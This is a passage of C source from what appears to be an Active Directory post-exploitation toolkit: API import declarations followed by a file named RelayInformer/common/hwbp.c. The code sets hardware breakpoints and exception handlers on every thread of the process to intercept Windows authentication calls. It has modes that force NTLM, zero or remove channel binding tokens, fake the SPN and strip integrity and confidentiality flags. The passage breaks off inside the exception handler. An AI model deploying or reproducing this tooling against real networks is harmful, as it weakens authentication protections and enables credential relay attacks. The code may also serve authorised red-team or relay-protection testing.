WINBASEAPI SQL_API SQLRETURN ODBC32$SQLAllocHandle(SQLSMALLINT HandleType, SQLHANDLE InputHandle, SQLHANDLE* OutputHandlePtr);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLCloseCursor(SQLHSTMT StatementHandle);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLDescribeCol(SQLHSTMT StatementHandle, SQLUSMALLINT ColumnNumber, SQLCHAR* ColumnName, SQLSMALLINT BufferLength, SQLSMALLINT* NameLengthPtr, SQLSMALLINT* DataTypePtr, SQLULEN* ColumnSizePtr, SQLSMALLINT* DecimalDigitsPtr, SQLSMALLINT* NullablePtr);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLDisconnect(SQLHDBC ConnectionHandle);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLDriverConnect(SQLHDBC ConnectionHandle, SQLHWND WindowHandle, SQLCHAR* InConnectionString, SQLSMALLINT StringLength1, SQLCHAR* OutConnectionString, SQLSMALLINT BufferLength, SQLSMALLINT* StringLength2Ptr, SQLUSMALLINT DriverCompletion);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLExecDirect(SQLHSTMT StatementHandle, SQLCHAR* StatementText, SQLINTEGER TextLength);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLFetch(SQLHSTMT StatementHandle);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLFreeHandle(SQLSMALLINT HandleType, SQLHANDLE Handle);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLGetData(SQLHSTMT StatementHandle, SQLUSMALLINT ColumnNumber, SQLSMALLINT TargetType, SQLPOINTER TargetValuePtr, SQLLEN BufferLength, SQLLEN* StrLen_or_IndPtr);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLGetDiagRec(SQLSMALLINT HandleType, SQLHANDLE Handle, SQLSMALLINT RecNumber, SQLCHAR* Sqlstate, SQLINTEGER* NativeErrorPtr, SQLCHAR* MessageText, SQLSMALLINT BufferLength, SQLSMALLINT* TextLengthPtr);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLNumResultCols(SQLHSTMT StatementHandle, SQLSMALLINT* ColumnCountPtr);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLMoreResults(SQLHSTMT StatementHandle);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLSetEnvAttr(SQLHENV EnvironmentHandle, SQLINTEGER Attribute, SQLPOINTER ValuePtr, SQLINTEGER StringLength);
WINBASEAPI SQL_API SQLRETURN ODBC32$SQLSetStmtAttr(SQLHSTMT StatementHandle, SQLINTEGER Attribute, SQLPOINTER Value, SQLINTEGER StringLength);

//WS2_32
WINBASEAPI int STDCALL WS2_32$closesocket(SOCKET s);
WINBASEAPI u_short STDCALL WS2_32$htons(u_short hostshort);
WINBASEAPI int STDCALL WS2_32$inet_pton(int af, const char *src, void *dst);
WINBASEAPI int STDCALL WS2_32$recvfrom(SOCKET s, char *buf, int len, int flags, struct sockaddr *from, int *fromlen);
WINBASEAPI int STDCALL WS2_32$sendto(SOCKET s, const char *buf, int len, int flags, const struct sockaddr *to, int tolen);
WINBASEAPI int STDCALL WS2_32$setsockopt(SOCKET s, int level, int optname, const char *optval, int optlen);
WINBASEAPI SOCKET STDCALL WS2_32$socket(int af, int type, int protocol);
WINBASEAPI int STDCALL WS2_32$WSACleanup();
WINBASEAPI int STDCALL WS2_32$WSAGetLastError();
WINBASEAPI int STDCALL WS2_32$WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData);
WINBASEAPI int STDCALL WS2_32$connect(SOCKET s, const struct sockaddr *name, int namelen);
WINBASEAPI int STDCALL WS2_32$send(SOCKET s, const char *buf, int len, int flags);
WINBASEAPI int STDCALL WS2_32$recv(SOCKET s, char *buf, int len, int flags);
WINBASEAPI int WSAAPI WS2_32$getaddrinfo(const char *nodename,const char *servname,const struct addrinfo *hints,struct addrinfo **res);
WINBASEAPI void WSAAPI WS2_32$freeaddrinfo(struct addrinfo *res);

// WLDAP32
WINBASEAPI ULONG WINAPI WLDAP32$ldap_connect(LDAP *ld, const struct l_timeval *timeout);
WINBASEAPI ULONG WINAPI WLDAP32$ldap_unbind(LDAP *ld);
WINBASEAPI LDAP* WINAPI WLDAP32$ldap_initW(PWSTR HostName, ULONG PortNumber);
WINBASEAPI LDAP* WINAPI WLDAP32$ldap_sslinitW(PWSTR HostName, ULONG PortNumber, ULONG secure);
WINBASEAPI ULONG WINAPI WLDAP32$ldap_set_optionW(LDAP *ld, int option, const void *invalue);
WINBASEAPI ULONG WINAPI WLDAP32$ldap_sasl_bind_sW(LDAP *ld, const PWSTR dn, const PWSTR authmechanism, const BERVAL *cred, const PLDAPControlW *serverctrls, const PLDAPControlW *clientctrls, PBERVAL *serverdata);
WINBASEAPI ULONG WINAPI WLDAP32$ldap_set_optionW(LDAP *ld, int option, const void *invalue);
WINBASEAPI ULONG WINAPI WLDAP32$ldap_bind_s(LDAP *ld, const PSTR dn, const PWSTR cred, ULONG method);
WINBASEAPI LDAP* WINAPI WLDAP32$ldap_init(PSTR HostName, ULONG PortNumber);
WINBASEAPI ULONG WINAPI WLDAP32$ldap_bind(LDAP *ld, const PWSTR dn, const PWSTR cred, ULONG method);
WINBASEAPI ULONG WINAPI WLDAP32$ldap_get_optionW(LDAP *ld, int option, void *outvalue);

// DNSAPI
WINBASEAPI DNS_STATUS WINAPI DNSAPI$DnsQuery_A(PCSTR lpstrName, WORD wType, DWORD Options, PVOID pExtra, PDNS_RECORDA* ppQueryResults, PVOID* pReserved);
WINBASEAPI VOID WINAPI DNSAPI$DnsRecordListFree(PDNS_RECORDA pRecordList, DNS_FREE_TYPE FreeType);

// WINHTTP
WINBASEAPI HINTERNET WINAPI WINHTTP$WinHttpOpen(LPCWSTR pszAgentW, DWORD dwAccessType, LPCWSTR pszProxyW, LPCWSTR pszProxyBypassW, DWORD dwFlags);
WINBASEAPI HINTERNET WINAPI WINHTTP$WinHttpConnect(HINTERNET hSession, LPCWSTR pswzServerName, INTERNET_PORT nServerPort, DWORD dwReserved);
WINBASEAPI HINTERNET WINAPI WINHTTP$WinHttpOpenRequest(HINTERNET hConnect, LPCWSTR pwszVerb, LPCWSTR pwszObjectName, LPCWSTR pwszVersion, LPCWSTR pwszReferrer, LPCWSTR *ppwszAcceptTypes, DWORD dwFlags);
WINBASEAPI BOOL WINAPI WINHTTP$WinHttpSendRequest(HINTERNET hRequest, LPCWSTR lpszHeaders, DWORD dwHeadersLength, LPVOID lpOptional, DWORD dwOptionalLength, DWORD dwTotalLength, DWORD_PTR dwContext);
WINBASEAPI BOOL WINAPI WINHTTP$WinHttpReceiveResponse(HINTERNET hRequest, LPVOID lpReserved);
WINBASEAPI BOOL WINAPI WINHTTP$WinHttpQueryHeaders(HINTERNET hRequest, DWORD dwInfoLevel, LPCWSTR pwszName, LPVOID lpBuffer, LPDWORD lpdwBufferLength, LPDWORD lpdwIndex);
WINBASEAPI BOOL WINAPI WINHTTP$WinHttpReadData(HINTERNET hRequest, LPVOID lpBuffer, DWORD dwNumberOfBytesToRead, LPDWORD lpdwNumberOfBytesRead);
WINBASEAPI BOOL WINAPI WINHTTP$WinHttpCloseHandle(HINTERNET hInternet);
WINBASEAPI BOOL WINAPI WINHTTP$WinHttpSetOption(HINTERNET hInternet, DWORD dwOption, LPVOID lpBuffer, DWORD dwBufferLength);
WINBASEAPI BOOL WINAPI WINHTTP$WinHttpQueryOption(HINTERNET hInternet, DWORD dwOption, LPVOID lpBuffer, LPDWORD lpdwBufferLength);
WINBASEAPI BOOL WINAPI WINHTTP$WinHttpQueryAuthSchemes(HINTERNET hRequest, LPDWORD lpdwSupportedSchemes, LPDWORD lpdwFirstScheme, LPDWORD pdwAuthTarget);
WINBASEAPI BOOL WINAPI WINHTTP$WinHttpSetCredentials(HINTERNET hRequest, DWORD dwAuthTargets, DWORD dwAuthScheme, LPCWSTR pwszUserName, LPCWSTR pwszPassword, LPVOID pAuthParams);
WINBASEAPI BOOL WINAPI WINHTTP$WinHttpAddRequestHeaders(HINTERNET hRequest, LPCWSTR lpszHeaders, DWORD dwHeadersLength, DWORD dwModifiers);
WINBASEAPI BOOL WINAPI WINHTTP$WinHttpQueryDataAvailable(HINTERNET hRequest, LPDWORD lpdwNumberOfBytesAvailable);
WINBASEAPI BOOL WINAPI WINHTTP$WinHttpCrackUrl(LPCWSTR lpszUrl, DWORD dwUrlLength, DWORD dwFlags, LPURL_COMPONENTSW lpUrlComponents);

#else

#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)
#define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr)
#define intZeroMemory(addr,size) MSVCRT$memset((addr),0,size)

// KERNEL32
#define KERNEL32$CloseHandle CloseHandle
#define KERNEL32$CreateThread CreateThread
#define Kernel32$WideCharToMultiByte  WideCharToMultiByte 
#define Kernel32$MultiByteToWideChar MultiByteToWideChar
#define KERNEL32$HeapFree  HeapFree 
#define KERNEL32$GetProcessHeap GetProcessHeap
#define KERNEL32$HeapAlloc HeapAlloc
#define KERNEL32$WaitForSingleObject WaitForSingleObject
#define KERNEL32$AddVectoredExceptionHandler AddVectoredExceptionHandler
#define KERNEL32$RemoveVectoredExceptionHandler RemoveVectoredExceptionHandler
#define KERNEL32$GetCurrentThread GetCurrentThread
#define KERNEL32$GetCurrentThreadId GetCurrentThreadId
#define KERNEL32$GetCurrentProcessId GetCurrentProcessId
#define KERNEL32$GetThreadContext GetThreadContext
#define KERNEL32$SetThreadContext SetThreadContext
#define KERNEL32$GetModuleHandleA GetModuleHandleA
#define KERNEL32$GetProcAddress GetProcAddress
#define KERNEL32$GetComputerNameExA GetComputerNameExA
#define KERNEL32$VirtualProtect VirtualProtect
#define KERNEL32$GetSystemInfo GetSystemInfo
#define KERNEL32$VirtualQuery VirtualQuery
#define KERNEL32$LoadLibraryA LoadLibraryA
#define KERNEL32$CreateToolhelp32Snapshot CreateToolhelp32Snapshot
#define KERNEL32$Thread32First Thread32First
#define KERNEL32$Thread32Next Thread32Next
#define KERNEL32$OpenThread OpenThread
#define KERNEL32$SuspendThread SuspendThread
#define KERNEL32$ResumeThread ResumeThread

// MSVCRT
#define MSVCRT$atoi atoi
#define MSVCRT$calloc calloc
#define MSVCRT$free free
#define MSVCRT$malloc malloc
#define MSVCRT$memcpy memcpy
#define MSVCRT$memset memset
#define MSVCRT$memcmp memcmp
#define MSVCRT$rand rand
#define MSVCRT$srand srand
#define MSVCRT$sprintf sprintf
#define MSVCRT$strcat strcat
#define MSVCRT$strcmp strcmp
#define MSVCRT$strncmp strncmp
#define MSVCRT$strchr strchr
#define MSVCRT$strlen strlen
#define MSVCRT$strncat strncat
#define MSVCRT$strncpy strncpy
#define MSVCRT$strstr strstr
#define MSVCRT$time time
#define MSVCRT$vsnprintf vsnprintf
#define MSVCRT$strcpy strcpy
#define MSVCRT$_strnicmp _strnicmp

// ODBC32
#define ODBC32$SQLAllocHandle SQLAllocHandle
#define ODBC32$SQLCloseCursor SQLCloseCursor
#define ODBC32$SQLDescribeCol SQLDescribeCol
#define ODBC32$SQLDisconnect SQLDisconnect
#define ODBC32$SQLDriverConnect SQLDriverConnect
#define ODBC32$SQLExecDirect SQLExecDirect
#define ODBC32$SQLFetch SQLFetch
#define ODBC32$SQLFreeHandle SQLFreeHandle
#define ODBC32$SQLGetData SQLGetData
#define ODBC32$SQLGetDiagRec SQLGetDiagRec
#define ODBC32$SQLNumResultCols SQLNumResultCols
#define ODBC32$SQLMoreResults SQLMoreResults
#define ODBC32$SQLSetEnvAttr SQLSetEnvAttr
#define ODBC32$SQLSetStmtAttr SQLSetStmtAttr

//WS2_32
#define WS2_32$closesocket closesocket
#define WS2_32$htons htons
#define WS2_32$inet_pton inet_pton
#define WS2_32$recvfrom recvfrom
#define WS2_32$sendto sendto
#define WS2_32$setsockopt setsockopt
#define WS2_32$socket socket
#define WS2_32$WSACleanup WSACleanup
#define WS2_32$WSAGetLastError WSAGetLastError
#define WS2_32$WSAStartup WSAStartup
#define WS2_32$connect connect
#define WS2_32$send send
#define WS2_32$recv recv
#define WS2_32$getaddrinfo getaddrinfo
#define WS2_32$freeaddrinfo freeaddrinfo

// WLDAP32
#define WLDAP32$ldap_initA ldap_initA
#define WLDAP32$ldap_sslinitA ldap_sslinitA
#define WLDAP32$ldap_set_optionA ldap_set_optionA
#define WLDAP32$ldap_connect ldap_connect
#define WLDAP32$ldap_bind_sA ldap_bind_sA
#define WLDAP32$ldap_unbind ldap_unbind
#define WLDAP32$ldap_initW ldap_initW
#define WLDAP32$ldap_sslinitW ldap_sslinitW
#define WLDAP32$ldap_set_optionW ldap_set_optionW
#define WLDAP32$ldap_sasl_bind_sW ldap_sasl_bind_sW
#define WLDAP32$ldap_get_optionW ldap_get_optionW

// DNSAPI
#define DNSAPI$DnsQuery_A DnsQuery_A
#define DNSAPI$DnsRecordListFree DnsRecordListFree
#define WLDAP32$ldap_bind_s ldap_bind_s
#define WLDAP32$ldap_init ldap_init
#define WLDAP32$ldap_bind ldap_bind
#define WLDAP32$ldap_get_optionW ldap_get_optionW

// WINHTTP
#define WINHTTP$WinHttpOpen WinHttpOpen
#define WINHTTP$WinHttpConnect WinHttpConnect
#define WINHTTP$WinHttpOpenRequest WinHttpOpenRequest
#define WINHTTP$WinHttpSendRequest WinHttpSendRequest
#define WINHTTP$WinHttpReceiveResponse WinHttpReceiveResponse
#define WINHTTP$WinHttpQueryHeaders WinHttpQueryHeaders
#define WINHTTP$WinHttpReadData WinHttpReadData
#define WINHTTP$WinHttpCloseHandle WinHttpCloseHandle
#define WINHTTP$WinHttpSetOption WinHttpSetOption
#define WINHTTP$WinHttpQueryAuthSchemes WinHttpQueryAuthSchemes
#define WINHTTP$WinHttpSetCredentials WinHttpSetCredentials
#define WINHTTP$WinHttpAddRequestHeaders WinHttpAddRequestHeaders
#define WINHTTP$WinHttpQueryDataAvailable WinHttpQueryDataAvailable
#define WINHTTP$WinHttpQueryOption WinHttpQueryOption
#define WINHTTP$WinHttpCrackUrl WinHttpCrackUrl

#endif


================================================
FILE: AD-BOF/RelayInformer/common/hwbp.c
================================================
// Public API
// - HWBP_SetOnAddress: set a hardware breakpoint (execute) in DR0-DR3 on current thread
// - HWBP_Clear: clear a hardware breakpoint in DR0-DR3 on current thread
// - HWBP_SetOnApi: resolve module!proc, register VEH (optional), set HWBP, return address and VEH handle
// - HWBP_RemoveVeh: unregister a previously added VEH
// - HWBP_SetOnApiEx: like HWBP_SetOnApi but can arm all threads too
// - HWBP_ClearOnAllThreads: clear a DR index on all other threads (skip current; caller clears current)

// DR target addresses for precise filtering
static PVOID g_hw_iscw_addr = NULL;
static PVOID g_hw_achw_addr = NULL;
static PVOID g_hw_isca_addr = NULL;
static PVOID g_hw_acha_addr = NULL;

static inline void* hwbp_resolve_api(const char* moduleNameA, const char* procNameA) {
	if (!moduleNameA || !procNameA) return NULL;
	HMODULE hMod = KERNEL32$GetModuleHandleA(moduleNameA);
	if (!hMod) {
		hMod = KERNEL32$LoadLibraryA(moduleNameA);
		if (!hMod) return NULL;
	}
	FARPROC fp = KERNEL32$GetProcAddress(hMod, procNameA);
	return (void*)fp;
}

static inline BOOL hwbp_set_dr(CONTEXT* ctx, int regIndex, void* address) {
	if (!ctx || regIndex < 0 || regIndex > 3) return FALSE;
	// Assign address to the selected DRx
	switch (regIndex) {
		case 0: ctx->Dr0 = (ULONG_PTR)address; break;
		case 1: ctx->Dr1 = (ULONG_PTR)address; break;
		case 2: ctx->Dr2 = (ULONG_PTR)address; break;
		case 3: ctx->Dr3 = (ULONG_PTR)address; break;
		default: return FALSE;
	}
	// Configure DR7: enable local breakpoint Ln, type=execute (RW=00), len=1 (LEN=00)
	ULONG_PTR dr7 = ctx->Dr7;
	// Clear enable bits for the selected index (local/global)
	dr7 &= ~(1ULL << (regIndex * 2));     // Ln
	dr7 &= ~(1ULL << (regIndex * 2 + 1)); // Gn
	// Set local enable (Ln)
	dr7 |= (1ULL << (regIndex * 2));
	// Clear RWn and LENn fields (bits 16..31)
	const unsigned rwShift = 16 + (regIndex * 4);
	const unsigned lenShift = rwShift + 2;
	dr7 &= ~(3ULL << rwShift); // RWn = 00 (execute)
	dr7 &= ~(3ULL << lenShift); // LENn = 00 (1 byte) – ignored for execute
	ctx->Dr7 = dr7;
	return TRUE;
}

static inline BOOL hwbp_clear_dr(CONTEXT* ctx, int regIndex) {
	if (!ctx || regIndex < 0 || regIndex > 3) return FALSE;
	// Clear address in DRx
	switch (regIndex) {
		case 0: ctx->Dr0 = 0; break;
		case 1: ctx->Dr1 = 0; break;
		case 2: ctx->Dr2 = 0; break;
		case 3: ctx->Dr3 = 0; break;
		default: return FALSE;
	}
	// Disable Ln/Gn and clear RW/LEN for this index
	ULONG_PTR dr7 = ctx->Dr7;
	dr7 &= ~(1ULL << (regIndex * 2));     // Ln
	dr7 &= ~(1ULL << (regIndex * 2 + 1)); // Gn
	const unsigned rwShift = 16 + (regIndex * 4);
	const unsigned lenShift = rwShift + 2;
	dr7 &= ~(3ULL << rwShift);
	dr7 &= ~(3ULL << lenShift);
	ctx->Dr7 = dr7;
	return TRUE;
}

BOOL HWBP_SetOnAddress(void* address, int regIndex) {
	if (!address || regIndex < 0 || regIndex > 3) return FALSE;
	HANDLE hThread = KERNEL32$GetCurrentThread();
	CONTEXT ctx; intZeroMemory(&ctx, sizeof(ctx));
	ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
	if (!KERNEL32$GetThreadContext(hThread, &ctx)) return FALSE;
	if (!hwbp_set_dr(&ctx, regIndex, address)) return FALSE;
	return KERNEL32$SetThreadContext(hThread, &ctx);
}

BOOL HWBP_Clear(int regIndex) {
	if (regIndex < 0 || regIndex > 3) return FALSE;
	HANDLE hThread = KERNEL32$GetCurrentThread();
	CONTEXT ctx; intZeroMemory(&ctx, sizeof(ctx));
	ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
	if (!KERNEL32$GetThreadContext(hThread, &ctx)) return FALSE;
	if (!hwbp_clear_dr(&ctx, regIndex)) return FALSE;
	return KERNEL32$SetThreadContext(hThread, &ctx);
}

BOOL HWBP_RemoveVeh(PVOID vehHandle) {
	if (!vehHandle) return FALSE;
	ULONG rc = KERNEL32$RemoveVectoredExceptionHandler(vehHandle);
	return (rc != 0);
}

// Arm DR on all threads in the process for the given address/regIndex; returns count of threads armed
static int ArmAllThreadsHwBps(void* address, int regIndex) {
	if (!address || regIndex < 0 || regIndex > 3) return 0;
	DWORD pid = KERNEL32$GetCurrentProcessId();
	DWORD currentTid = KERNEL32$GetCurrentThreadId();
	HANDLE snap = KERNEL32$CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
	if (snap == INVALID_HANDLE_VALUE) { return 0; }
	THREADENTRY32 te; te.dwSize = sizeof(te);
	int armed = 0;
	if (KERNEL32$Thread32First(snap, &te)) {
		do {
			if (te.th32OwnerProcessID != pid) continue;
			if (te.th32ThreadID == currentTid) {
				// current thread handled by caller
				continue;
			}
			HANDLE th = KERNEL32$OpenThread(THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT | THREAD_SET_CONTEXT, FALSE, te.th32ThreadID);
			if (!th) continue;
			KERNEL32$SuspendThread(th);
			CONTEXT ctx; intZeroMemory(&ctx, sizeof(ctx));
			ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
			if (KERNEL32$GetThreadContext(th, &ctx)) {
				if (hwbp_set_dr(&ctx, regIndex, address)) {
					if (KERNEL32$SetThreadContext(th, &ctx)) {
						armed++;
					}
				}
			}
			KERNEL32$ResumeThread(th);
			KERNEL32$CloseHandle(th);
		} while (KERNEL32$Thread32Next(snap, &te));
	}
	KERNEL32$CloseHandle(snap);
	return armed;
}

// Clear the specified DR register on all other threads in the process
int HWBP_ClearOnAllThreads(int regIndex) {
    if (regIndex < 0 || regIndex > 3) return 0;
    DWORD pid = KERNEL32$GetCurrentProcessId();
    DWORD currentTid = KERNEL32$GetCurrentThreadId();
    HANDLE snap = KERNEL32$CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (snap == INVALID_HANDLE_VALUE) { return 0; }
    THREADENTRY32 te; te.dwSize = sizeof(te);
    int cleared = 0;
    if (KERNEL32$Thread32First(snap, &te)) {
        do {
            if (te.th32OwnerProcessID != pid) continue;
            if (te.th32ThreadID == currentTid) continue;
            HANDLE th = KERNEL32$OpenThread(THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT | THREAD_SET_CONTEXT, FALSE, te.th32ThreadID);
            if (!th) continue;
            KERNEL32$SuspendThread(th);
            CONTEXT ctx; intZeroMemory(&ctx, sizeof(ctx));
            ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
            if (KERNEL32$GetThreadContext(th, &ctx)) {
                if (hwbp_clear_dr(&ctx, regIndex)) {
                    if (KERNEL32$SetThreadContext(th, &ctx)) {
                        cleared++;
                    }
                }
            }
            KERNEL32$ResumeThread(th);
            KERNEL32$CloseHandle(th);
        } while (KERNEL32$Thread32Next(snap, &te));
    }
    KERNEL32$CloseHandle(snap);
    return cleared;
}

// Convenience: resolve API, register VEH (optional), set HWBP. Any step failing will unwind VEH if set here.
BOOL HWBP_SetOnApiEx(
	const char* moduleNameA,
	const char* procNameA,
	int regIndex,
	PVECTORED_EXCEPTION_HANDLER vehHandler,
	PVOID* outVehHandle,
	void** outResolvedAddress,
	BOOL armAllThreads
) {
	if (!moduleNameA || !procNameA || regIndex < 0 || regIndex > 3) return FALSE;
	if (outVehHandle) *outVehHandle = NULL;
	if (outResolvedAddress) *outResolvedAddress = NULL;

	void* addr = hwbp_resolve_api(moduleNameA, procNameA);
	if (!addr) return FALSE;
	if (outResolvedAddress) *outResolvedAddress = addr;

	// Remember well-known targets for VEH filtering
	if (MSVCRT$strcmp(procNameA, "InitializeSecurityContextW") == 0) {
		g_hw_iscw_addr = addr;
	} else if (MSVCRT$strcmp(procNameA, "AcquireCredentialsHandleW") == 0) {
		g_hw_achw_addr = addr;
	} else if (MSVCRT$strcmp(procNameA, "InitializeSecurityContextA") == 0) {
		g_hw_isca_addr = addr;
	} else if (MSVCRT$strcmp(procNameA, "AcquireCredentialsHandleA") == 0) {
		g_hw_acha_addr = addr;
	}

	PVOID vehHandle = NULL;
	if (vehHandler) {
		vehHandle = KERNEL32$AddVectoredExceptionHandler(1, vehHandler);
		if (!vehHandle) return FALSE;
		if (outVehHandle) *outVehHandle = vehHandle;
	}

	// Arm current thread first
	if (!HWBP_SetOnAddress(addr, regIndex)) {
		if (vehHandle) {
			KERNEL32$RemoveVectoredExceptionHandler(vehHandle);
			if (outVehHandle) *outVehHandle = NULL;
		}
		return FALSE;
	}
	// Optionally arm all other threads
	if (armAllThreads) {
		ArmAllThreadsHwBps(addr, regIndex);
	}
	return TRUE;
}

// Toggle to force NTLM when ACHW requests Kerberos/Negotiate (or NULL)
static volatile LONG g_forceNtlm = 0;

// CBT manipulation mode: 0=observe, 1=zero hash, 2=remove CBT
static volatile LONG g_cbtMode = 0;
static volatile LONG g_cbtModified = 0;

// SPN override mode: 0=normal, 1=override TargetName with fake SPN
static volatile LONG g_spnMode = 0;
static volatile LONG g_spnModified = 0;

// Optional: strip INTEGRITY (0x00010000) and CONFIDENTIALITY (0x00000010) from ISC fContextReq
static volatile LONG g_stripProtFlags = 0;

static BOOL is_readable(const void* p, SIZE_T cb) {
    MEMORY_BASIC_INFORMATION mbi;
    if (!p) return FALSE;
    if (KERNEL32$VirtualQuery(p, &mbi, sizeof(mbi)) != sizeof(mbi)) return FALSE;
    if (mbi.State != MEM_COMMIT) return FALSE;
    // allow PAGE_READ* and PAGE_EXECUTE_READ* and writable variants
    DWORD prot = mbi.Protect & 0xFF;
    switch (prot) {
        case PAGE_READONLY: case PAGE_READWRITE: case PAGE_WRITECOPY:
        case PAGE_EXECUTE_READ: case PAGE_EXECUTE_READWRITE: case PAGE_EXECUTE_WRITECOPY:
            break;
        default: return FALSE;
    }
    // crude bound check for the requested range
    SIZE_T avail = (SIZE_T)((BYTE*)mbi.BaseAddress + mbi.RegionSize - (BYTE*)p);
    return avail >= cb;
}

static BOOL is_writable(void* p, SIZE_T cb) {
    MEMORY_BASIC_INFORMATION mbi;
    if (!p) return FALSE;
    if (KERNEL32$VirtualQuery(p, &mbi, sizeof(mbi)) != sizeof(mbi)) return FALSE;
    if (mbi.State != MEM_COMMIT) return FALSE;
    DWORD prot = mbi.Protect & 0xFF;
    switch (prot) {
        case PAGE_READWRITE: case PAGE_WRITECOPY:
        case PAGE_EXECUTE_READWRITE: case PAGE_EXECUTE_WRITECOPY:
            break;
        default: return FALSE;
    }
    SIZE_T avail = (SIZE_T)((BYTE*)mbi.BaseAddress + mbi.RegionSize - (BYTE*)p);
    return avail >= cb;
}

static size_t safe_wcs_len(const wchar_t* s, size_t maxChars) {
    if (!s) return 0;
    for (size_t i = 0; i < maxChars; i++) {
        if (!is_readable((const void*)(s + i), sizeof(wchar_t))) return i;
        if (s[i] == L'\0') return i;
    }
    return maxChars;
}

static void safe_wcs_to_utf8(const wchar_t* ws, char* out, size_t outSize) {
    if (!out || outSize == 0) return;
    out[0] = '\0';
    if (!ws) return;
    size_t wlen = safe_wcs_len(ws, 512);
    if (wlen == 0) return;
    // Convert with explicit length
    int need = Kernel32$WideCharToMultiByte(CP_UTF8, 0, ws, (int)wlen, out, (int)outSize - 1, NULL, NULL);
    if (need > 0) out[need] = '\0';
}

static BOOL safe_wcs_has_prefix(const wchar_t* ws, const wchar_t* prefix) {
    if (!ws || !prefix) return FALSE;
    size_t plen = 0;
    while (prefix[plen] != L'\0') plen++;
    // Ensure the source is readable for the prefix length
    for (size_t i = 0; i < plen; i++) {
        if (!is_readable((const void*)(ws + i), sizeof(wchar_t))) return FALSE;
        if (ws[i] != prefix[i]) return FALSE;
    }
    return TRUE;
}

static BOOL safe_str_has_prefix(const char* s, const char* prefix) {
    if (!s || !prefix) return FALSE;
    size_t plen = 0;
    while (prefix[plen] != '\0') plen++;
    // Ensure the source is readable for the prefix length
    for (size_t i = 0; i < plen; i++) {
        if (!is_readable((const void*)(s + i), sizeof(char))) return FALSE;
        if (s[i] != prefix[i]) return FALSE;
    }
    return TRUE;
}

static char clower(char c) { return (c >= 'A' && c <= 'Z') ? (char)(c + 32) : c; }
static BOOL safe_str_has_prefix_i(const char* s, const char* prefix) {
    if (!s || !prefix) return FALSE;
    size_t plen = 0;
    while (prefix[plen] != '\0') plen++;
    for (size_t i = 0; i < plen; i++) {
        if (!is_readable((const void*)(s + i), sizeof(char))) return FALSE;
        if (clower(s[i]) != clower(prefix[i])) return FALSE;
    }
    return TRUE;
}

#ifndef BOF
static void log_fContextReq_flags(ULONG f) {
    internal_printf("[ISC] fContextReq: 0x%08X\n", f);
    internal_printf("[ISC]   flags:");
    if (f & 0x00000001) internal_printf(" ISC_REQ_DELEGATE");
    if (f & 0x00000002) internal_printf(" ISC_REQ_MUTUAL_AUTH");
    if (f & 0x00000004) internal_printf(" ISC_REQ_REPLAY_DETECT");
    if (f & 0x00000008) internal_printf(" ISC_REQ_SEQUENCE_DETECT");
    if (f & 0x00000010) internal_printf(" ISC_REQ_CONFIDENTIALITY");
    if (f & 0x00000020) internal_printf(" ISC_REQ_USE_SESSION_KEY");
    if (f & 0x00000040) internal_printf(" ISC_REQ_PROMPT_FOR_CREDS");
    if (f & 0x00000080) internal_printf(" ISC_REQ_USE_SUPPLIED_CREDS");
    if (f & 0x00000100) internal_printf(" ISC_REQ_ALLOCATE_MEMORY");
    if (f & 0x00000200) internal_printf(" ISC_REQ_USE_DCE_STYLE");
    if (f & 0x00000400) internal_printf(" ISC_REQ_DATAGRAM");
    if (f & 0x00000800) internal_printf(" ISC_REQ_CONNECTION");
    if (f & 0x00001000) internal_printf(" ISC_REQ_CALL_LEVEL");
    if (f & 0x00002000) internal_printf(" ISC_REQ_FRAGMENT_SUPPLIED");
    if (f & 0x00004000) internal_printf(" ISC_REQ_EXTENDED_ERROR");
    if (f & 0x00008000) internal_printf(" ISC_REQ_STREAM");
    if (f & 0x00010000) internal_printf(" ISC_REQ_INTEGRITY");
    if (f & 0x00020000) internal_printf(" ISC_REQ_IDENTIFY");
    if (f & 0x00040000) internal_printf(" ISC_REQ_NULL_SESSION");
    if (f & 0x00080000) internal_printf(" ISC_REQ_MANUAL_CRED_VALIDATION");
    if (f & 0x00100000) internal_printf(" ISC_REQ_RESERVED1");
    if (f & 0x00200000) internal_printf(" ISC_REQ_FRAGMENT_TO_FIT");
    internal_printf("\n");
}
#endif

// Bounded wide copy helper
static void wcopy_bounded(wchar_t* dst, size_t dstMax, const wchar_t* src) {
    if (!dst || dstMax == 0) return;
    if (!src) { dst[0] = L'\0'; return; }
    size_t i = 0;
    for (; i + 1 < dstMax && src[i] != L'\0'; i++) dst[i] = src[i];
    dst[i] = L'\0';
}

static wchar_t wlower(wchar_t c) { return (c >= L'A' && c <= L'Z') ? (wchar_t)(c + 32) : c; }
static BOOL safe_wcs_has_prefix_i(const wchar_t* ws, const wchar_t* prefix) {
    if (!ws || !prefix) return FALSE;
    for (size_t i = 0; prefix[i] != L'\0'; i++) {
        if (!is_readable((const void*)(ws + i), sizeof(wchar_t))) return FALSE;
        if (wlower(ws[i]) != wlower(prefix[i])) return FALSE;
    }
    return TRUE;
}

static LONG CALLBACK ISC_VEH(EXCEPTION_POINTERS *ex) {
    DWORD code = ex->ExceptionRecord->ExceptionCode;
    if (code != 0x80000004 /* EXCEPTION_SINGLE_STEP */) return EXCEPTION_CONTINUE_SEARCH;
#ifdef _WIN64
